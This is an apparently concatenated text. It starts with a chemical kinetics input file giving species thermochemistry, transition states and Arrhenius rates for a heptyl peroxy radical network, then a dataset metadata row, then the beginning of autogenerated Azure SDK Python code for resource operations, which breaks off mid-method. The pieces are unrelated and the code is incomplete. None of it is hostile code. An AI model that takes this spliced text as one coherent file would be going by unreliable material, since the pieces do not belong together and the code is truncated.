thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.541478,0.103807,-8.37226e-05,3.74479e-08,-7.20635e-12,-13815,38.067], Tmin=(100,'K'), Tmax=(1185.08,'K')), NASAPolynomial(coeffs=[12.9953,0.058117,-2.5892e-05,4.91572e-09,-3.43586e-13,-17023.5,-29.5387], Tmin=(1185.08,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-116.195,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CCJCOOH)"""),
)
species(
label = 'C[CH]CC(CCC)OO(141)',
structure = SMILES('C[CH]CC(CCC)OO'),
E0 = (-122.164,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.289445,0.100884,-8.27272e-05,4.0318e-08,-8.7966e-12,-14544,37.6068], Tmin=(100,'K'), Tmax=(1036.34,'K')), NASAPolynomial(coeffs=[9.41781,0.0634168,-2.84961e-05,5.43144e-09,-3.80742e-13,-16555.9,-9.57154], Tmin=(1036.34,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-122.164,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJC)"""),
)
species(
label = '[CH2]CCC(CCC)OO(142)',
structure = SMILES('[CH2]CCC(CCC)OO'),
E0 = (-111.364,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([3000,3100,440,815,1455,1000,2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,2750,2800,2850,1350,1500,750,1050,1375,1000,3615,1310,387.5,850,1000,1380,1390,370,380,2900,435,200,800,1200,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (131.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.603592,0.103441,-8.16947e-05,3.51448e-08,-6.43845e-12,-13230.4,37.7671], Tmin=(100,'K'), Tmax=(1246.47,'K')), NASAPolynomial(coeffs=[14.1561,0.056077,-2.46975e-05,4.66063e-09,-3.24428e-13,-16909.9,-36.6921], Tmin=(1246.47,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-111.364,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(548.755,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-OsCs) + group(O2s-OsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(RCCJ)"""),
)
species(
label = 'CCC=CCCC(122)',
structure = SMILES('CCC=CCCC'),
E0 = (-98.9731,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2770,2790,2810,2830,2850,1425,1437.5,1450,1225,1250,1275,1270,1305,1340,700,750,800,300,350,400,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,2995,3025,975,1000,1300,1375,400,500,1630,1680,200,800,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (98.1861,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[0.516528,0.0646821,-1.31158e-05,-1.94274e-08,9.49365e-12,-11768.3,29.5503], Tmin=(100,'K'), Tmax=(1093.68,'K')), NASAPolynomial(coeffs=[12.5234,0.0444655,-1.78892e-05,3.29347e-09,-2.28557e-13,-15811.9,-35.9302], Tmin=(1093.68,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-98.9731,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(486.397,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(Cs-CsCsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-(Cds-Cds)CsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + group(Cds-CdsCsH) + group(Cds-CdsCsH)"""),
)
species(
label = 'HO2(10)',
structure = SMILES('[O]O'),
E0 = (2.67648,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([1112.8,1388.53,3298.45],'cm^-1')),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (33.0067,'amu'),
collisionModel = TransportData(shapeIndex=2, epsilon=(892.977,'J/mol'), sigma=(3.458,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=1.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[4.02957,-0.00263999,1.52235e-05,-1.71679e-08,6.26771e-12,322.677,4.84424], Tmin=(100,'K'), Tmax=(923.901,'K')), NASAPolynomial(coeffs=[4.1513,0.00191152,-4.11308e-07,6.35038e-11,-4.86452e-15,83.4341,3.09359], Tmin=(923.901,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(2.67648,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(58.2013,'J/(mol*K)'), label="""HO2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'O(4)',
structure = SMILES('[O]'),
E0 = (243.005,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (15.9994,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(665.16,'J/mol'), sigma=(2.75,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0.0, comment="""GRI-Mech"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,-2.38914e-13,3.12709e-16,-1.33367e-19,1.7499e-23,29226.7,5.11107], Tmin=(100,'K'), Tmax=(4383.16,'K')), NASAPolynomial(coeffs=[2.50003,-3.04997e-08,1.01101e-11,-1.48797e-15,8.20356e-20,29226.7,5.11085], Tmin=(4383.16,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(243.005,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""O""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'CCCC([O])CCC(151)',
structure = SMILES('CCCC([O])CCC'),
E0 = (-157.754,'kJ/mol'),
modes = [
HarmonicOscillator(frequencies=([2750,2764.29,2778.57,2792.86,2807.14,2821.43,2835.71,2850,1425,1433.33,1441.67,1450,1225,1241.67,1258.33,1275,1270,1293.33,1316.67,1340,700,733.333,766.667,800,300,333.333,366.667,400,1380,1390,370,380,2900,435,2750,2770,2790,2810,2830,2850,1350,1400,1450,1500,700,800,1000,1100,1350,1400,900,1100,200,800,1066.67,1333.33,1600],'cm^-1')),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
HinderedRotor(inertia=(0.156089,'amu*angstrom^2'), symmetry=1, barrier=(3.5888,'kJ/mol'), semiclassical=False),
],
spinMultiplicity = 2,
opticalIsomers = 1,
molecularWeight = (115.193,'amu'),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[-0.447159,0.089151,-5.8819e-05,1.98848e-08,-2.76336e-12,-18806.6,33.7866], Tmin=(100,'K'), Tmax=(1640.09,'K')), NASAPolynomial(coeffs=[18.0491,0.0440406,-1.75618e-05,3.11448e-09,-2.07048e-13,-24873.7,-64.5982], Tmin=(1640.09,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-157.754,'kJ/mol'), Cp0=(33.2579,'J/(mol*K)'), CpInf=(532.126,'J/(mol*K)'), comment="""Thermo group additivity estimation: group(O2s-CsH) + group(Cs-CsCsOsH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsCsHH) + group(Cs-CsHHH) + group(Cs-CsHHH) + radical(CC(C)OJ)"""),
)
species(
label = 'N2',
structure = SMILES('N#N'),
E0 = (-8.69489,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (28.0135,'amu'),
collisionModel = TransportData(shapeIndex=1, epsilon=(810.913,'J/mol'), sigma=(3.621,'angstroms'), dipoleMoment=(0,'C*m'), polarizability=(1.76,'angstroms^3'), rotrelaxcollnum=4.0, comment="""PrimaryTransportLibrary"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[3.61263,-0.00100893,2.49898e-06,-1.43375e-09,2.58635e-13,-1051.1,2.6527], Tmin=(100,'K'), Tmax=(1817.04,'K')), NASAPolynomial(coeffs=[2.97591,0.0016414,-7.19719e-07,1.25377e-10,-7.91522e-15,-1025.85,5.53754], Tmin=(1817.04,'K'), Tmax=(5000,'K'))], Tmin=(100,'K'), Tmax=(5000,'K'), E0=(-8.69489,'kJ/mol'), Cp0=(29.1007,'J/(mol*K)'), CpInf=(37.4151,'J/(mol*K)'), label="""N2""", comment="""Thermo library: BurkeH2O2"""),
)
species(
label = 'Ne',
structure = SMILES('[Ne]'),
E0 = (-6.19738,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
molecularWeight = (20.1797,'amu'),
collisionModel = TransportData(shapeIndex=0, epsilon=(1235.53,'J/mol'), sigma=(3.758e-10,'m'), dipoleMoment=(0,'C*m'), polarizability=(0,'angstroms^3'), rotrelaxcollnum=0, comment="""Epsilon & sigma estimated with fixed Lennard Jones Parameters. This is the fallback method! Try improving transport databases!"""),
energyTransferModel = SingleExponentialDown(alpha0=(3.5886,'kJ/mol'), T0=(300,'K'), n=0.85),
thermo = NASA(polynomials=[NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(200,'K'), Tmax=(1000,'K')), NASAPolynomial(coeffs=[2.5,0,0,0,0,-745.375,3.35532], Tmin=(1000,'K'), Tmax=(6000,'K'))], Tmin=(200,'K'), Tmax=(6000,'K'), E0=(-6.19738,'kJ/mol'), Cp0=(20.7862,'J/(mol*K)'), CpInf=(20.7862,'J/(mol*K)'), label="""Ne""", comment="""Thermo library: primaryThermoLibrary"""),
)
transitionState(
label = 'TS1',
E0 = (-29.8083,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS2',
E0 = (195.023,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS3',
E0 = (234.086,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS4',
E0 = (204.792,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS5',
E0 = (247.602,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS6',
E0 = (200.694,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS7',
E0 = (241.633,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS8',
E0 = (252.433,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS9',
E0 = (278.096,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS10',
E0 = (-3.6475,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS11',
E0 = (-32.0968,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS12',
E0 = (-87.2015,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS13',
E0 = (-54.8589,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS14',
E0 = (-40.7595,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
transitionState(
label = 'TS15',
E0 = (85.2504,'kJ/mol'),
spinMultiplicity = 1,
opticalIsomers = 1,
)
reaction(
label = 'reaction1',
reactants = ['O2(2)', 'CCC[CH]CCC(73)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS1',
kinetics = Arrhenius(A=(7.54e+12,'cm^3/(mol*s)','+|-',1e+12), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 112 used for O2_birad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;O2_birad]
Euclidian distance = 0
Multiplied by reaction path degeneracy 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction6',
reactants = ['CCC[CH]O[O](143)', 'npropyl(70)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS2',
kinetics = Arrhenius(A=(1.15e+14,'cm^3/(mol*s)','*|/',2), n=-0.35, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""Estimated using template [C_rad/H/NonDe;C_rad/H2/Cs] for rate rule [C_rad/H/CsO;C_rad/H2/Cs]
Euclidian distance = 2.0
family: R_Recombination"""),
)
reaction(
label = 'reaction7',
reactants = ['H(3)', 'CCC[C](CCC)O[O](144)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS3',
kinetics = Arrhenius(A=(6.68468e+06,'m^3/(mol*s)'), n=-0.0135, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [C_rad/NonDe;Y_rad] for rate rule [C_rad/NonDeCO;H_rad]
Euclidian distance = 2.2360679775
family: R_Recombination
Ea raised from -0.9 to 0 kJ/mol."""),
)
reaction(
label = 'reaction8',
reactants = ['C2H5(32)', '[CH2]C(CCC)O[O](145)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS4',
kinetics = Arrhenius(A=(8.73e+14,'cm^3/(mol*s)'), n=-0.699, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 11 used for C_rad/H2/Cs;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_rad/H2/Cs]
Euclidian distance = 0
family: R_Recombination
Ea raised from -0.0 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['H(3)', 'CC[CH]C(CCC)O[O](146)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS5',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction10',
reactants = ['[CH2]CC(CCC)O[O](147)', 'CH3(18)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS6',
kinetics = Arrhenius(A=(1.23e+15,'cm^3/(mol*s)'), n=-0.562, Ea=(0.085772,'kJ/mol'), T0=(1,'K'), Tmin=(200,'K'), Tmax=(2000,'K'), comment="""From training reaction 10 used for C_methyl;C_rad/H2/Cs
Exact match found for rate rule [C_rad/H2/Cs;C_methyl]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction11',
reactants = ['H(3)', 'C[CH]CC(CCC)O[O](148)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS7',
kinetics = Arrhenius(A=(2e+13,'cm^3/(mol*s)','*|/',3.16), n=0, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2000,'K'), comment="""From training reaction 59 used for H_rad;C_rad/H/NonDeC
Exact match found for rate rule [C_rad/H/NonDeC;H_rad]
Euclidian distance = 0
family: R_Recombination"""),
)
reaction(
label = 'reaction12',
reactants = ['H(3)', '[CH2]CCC(CCC)O[O](149)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS8',
kinetics = Arrhenius(A=(3.48677e-12,'cm^3/(molecule*s)'), n=0.6, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""From training reaction 18 used for C_rad/H2/Cs;H_rad
Exact match found for rate rule [C_rad/H2/Cs;H_rad]
Euclidian distance = 0
family: R_Recombination
Ea raised from -3.3 to 0 kJ/mol."""),
)
reaction(
label = 'reaction9',
reactants = ['CH2(S)(24)', 'CCCC(CC)O[O](150)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS9',
kinetics = Arrhenius(A=(1.31021e+06,'m^3/(mol*s)'), n=0.189, Ea=(0,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [carbene;C_pri] for rate rule [carbene;C_pri/NonDeC]
Euclidian distance = 1.0
Multiplied by reaction path degeneracy 3.0
family: 1,2_Insertion_carbene
Ea raised from -1.5 to 0 kJ/mol."""),
)
reaction(
label = 'reaction2',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['CCC[C](CCC)OO(139)'],
transitionState = 'TS10',
kinetics = Arrhenius(A=(4.97e+09,'s^-1'), n=1.01, Ea=(160.958,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 245 used for R3H_SS_O;O_rad_out;Cs_H_out_Cs2
Exact match found for rate rule [R3H_SS_O;O_rad_out;Cs_H_out_Cs2]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction3',
reactants = ['CC[CH]C(CCC)OO(140)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS11',
kinetics = Arrhenius(A=(2960,'s^-1'), n=2.11, Ea=(84.0984,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(2500,'K'), comment="""From training reaction 323 used for R4H_SSS;C_rad_out_H/NonDeC;O_H_out
Exact match found for rate rule [R4H_SSS;C_rad_out_H/NonDeC;O_H_out]
Euclidian distance = 0
family: intra_H_migration"""),
)
reaction(
label = 'reaction4',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['C[CH]CC(CCC)OO(141)'],
transitionState = 'TS12',
kinetics = Arrhenius(A=(1.352e+11,'s^-1'), n=0.21, Ea=(77.404,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 261 used for R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC
Exact match found for rate rule [R5H_SSSS_OCC_C;O_rad_out;Cs_H_out_H/NonDeC]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction5',
reactants = ['[CH2]CCC(CCC)OO(142)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS13',
kinetics = Arrhenius(A=(135.127,'s^-1'), n=2.18479, Ea=(56.5049,'kJ/mol'), T0=(1,'K'), comment="""Estimated using template [R6H_SSSSS;C_rad_out_2H;XH_out] for rate rule [R6H_SSSSS;C_rad_out_2H;O_H_out]
Euclidian distance = 1.0
family: intra_H_migration"""),
)
reaction(
label = 'reaction14',
reactants = ['CCCC(CCC)O[O](138)'],
products = ['CCC=CCCC(122)', 'HO2(10)'],
transitionState = 'TS14',
kinetics = Arrhenius(A=(6.6e+09,'s^-1'), n=1.01, Ea=(123.846,'kJ/mol'), T0=(1,'K'), Tmin=(300,'K'), Tmax=(1500,'K'), comment="""From training reaction 6 used for R2OO_HNd_HNd
Exact match found for rate rule [R2OO_HNd_HNd]
Euclidian distance = 0
Multiplied by reaction path degeneracy 4.0
family: HO2_Elimination_from_PeroxyRadical"""),
)
reaction(
label = 'reaction15',
reactants = ['O(4)', 'CCCC([O])CCC(151)'],
products = ['CCCC(CCC)O[O](138)'],
transitionState = 'TS15',
kinetics = Arrhenius(A=(54738.4,'m^3/(mol*s)'), n=0.884925, Ea=(0,'kJ/mol'), T0=(1,'K'), Tmin=(303.03,'K'), Tmax=(2000,'K'), comment="""From training reaction 3 used for O_rad/NonDe;O_birad
Exact match found for rate rule [O_rad/NonDe;O_birad]
Euclidian distance = 0
family: Birad_R_Recombination
Ea raised from -2.9 to 0 kJ/mol."""),
)
network(
label = '42',
isomers = [
'CCCC(CCC)O[O](138)',
],
reactants = [
('O2(2)', 'CCC[CH]CCC(73)'),
],
bathGas = {
'N2': 0.5,
'Ne': 0.5,
},
)
pressureDependence(
label = '42',
Tmin = (300,'K'),
Tmax = (2000,'K'),
Tcount = 8,
Tlist = ([302.47,323.145,369.86,455.987,609.649,885.262,1353.64,1896.74],'K'),
Pmin = (0.01,'bar'),
Pmax = (100,'bar'),
Pcount = 5,
Plist = ([0.0125282,0.0667467,1,14.982,79.8202],'bar'),
maximumGrainSize = (0.5,'kcal/mol'),
minimumGrainCount = 250,
method = 'modified strong collision',
interpolationModel = ('Chebyshev', 6, 4),
activeKRotor = True,
activeJRotor = True,
rmgmode = True,
)
| [
"[email protected]"
]
| |
30fc99c1e299f230a6679c3c4150367665d667e7 | 30736dab9d8e682e5603d4803349144a5f6a84fb | /sdk/resources/azure-mgmt-resource/azure/mgmt/resource/resources/v2019_08_01/operations/_resources_operations.py | 2532fbe114047a2aa4df6e55706d0512029e99c1 | [
"MIT",
"LicenseRef-scancode-generic-cla"
]
| permissive | montgomp/azure-sdk-for-python | 6fcaffc59f4321852aa71109691e94ad38c66464 | 0ffb0b0de095b97cbc5b69309bbce0a3b91d3eb4 | refs/heads/master | 2020-12-06T11:08:01.683369 | 2020-01-07T23:24:42 | 2020-01-07T23:24:42 | 232,445,563 | 1 | 0 | MIT | 2020-01-08T00:45:33 | 2020-01-08T00:45:33 | null | UTF-8 | Python | false | false | 64,532 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrestazure.azure_exceptions import CloudError
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class ResourcesOperations(object):
"""ResourcesOperations operations.
You should not instantiate directly this class, but create a Client instance that will create it for you and attach it as attribute.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: The API version to use for this operation. Constant value: "2019-08-01".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2019-08-01"
self.config = config
def list_by_resource_group(
self, resource_group_name, filter=None, expand=None, top=None, custom_headers=None, raw=False, **operation_config):
"""Get all the resources for a resource group.
:param resource_group_name: The resource group with the resources to
get.
:type resource_group_name: str
:param filter: The filter to apply on the operation.<br><br>The
properties you can use for eq (equals) or ne (not equals) are:
location, resourceType, name, resourceGroup, identity,
identity/principalId, plan, plan/publisher, plan/product, plan/name,
plan/version, and plan/promotionCode.<br><br>For example, to filter by
a resource type, use: $filter=resourceType eq
'Microsoft.Network/virtualNetworks'<br><br>You can use
substringof(value, property) in the filter. The properties you can use
for substring are: name and resourceGroup.<br><br>For example, to get
all resources with 'demo' anywhere in the name, use:
$filter=substringof('demo', name)<br><br>You can link more than one
substringof together by adding and/or operators.<br><br>You can filter
by tag names and values. For example, to filter for a tag name and
value, use $filter=tagName eq 'tag1' and tagValue eq 'Value1'. When
you filter by a tag name and value, the tags for each resource are not
returned in the results.<br><br>You can use some properties together
when filtering. The combinations you can use are: substringof and/or
resourceType, plan and plan/publisher and plan/name, identity and
identity/principalId.
:type filter: str
:param expand: The $expand query parameter. You can expand createdTime
and changedTime. For example, to expand both properties, use
$expand=changedTime,createdTime
:type expand: str
:param top: The number of results to return. If null is passed,
returns all resources.
:type top: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of GenericResource
:rtype:
~azure.mgmt.resource.resources.v2019_08_01.models.GenericResourcePaged[~azure.mgmt.resource.resources.v2019_08_01.models.GenericResource]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_by_resource_group.metadata['url']
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
if filter is not None:
query_parameters['$filter'] = self._serialize.query("filter", filter, 'str')
if expand is not None:
query_parameters['$expand'] = self._serialize.query("expand", expand, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query("top", top, 'int')
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.GenericResourcePaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_by_resource_group.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/resources'}
def _move_resources_initial(
self, source_resource_group_name, resources=None, target_resource_group=None, custom_headers=None, raw=False, **operation_config):
parameters = models.ResourcesMoveInfo(resources=resources, target_resource_group=target_resource_group)
# Construct URL
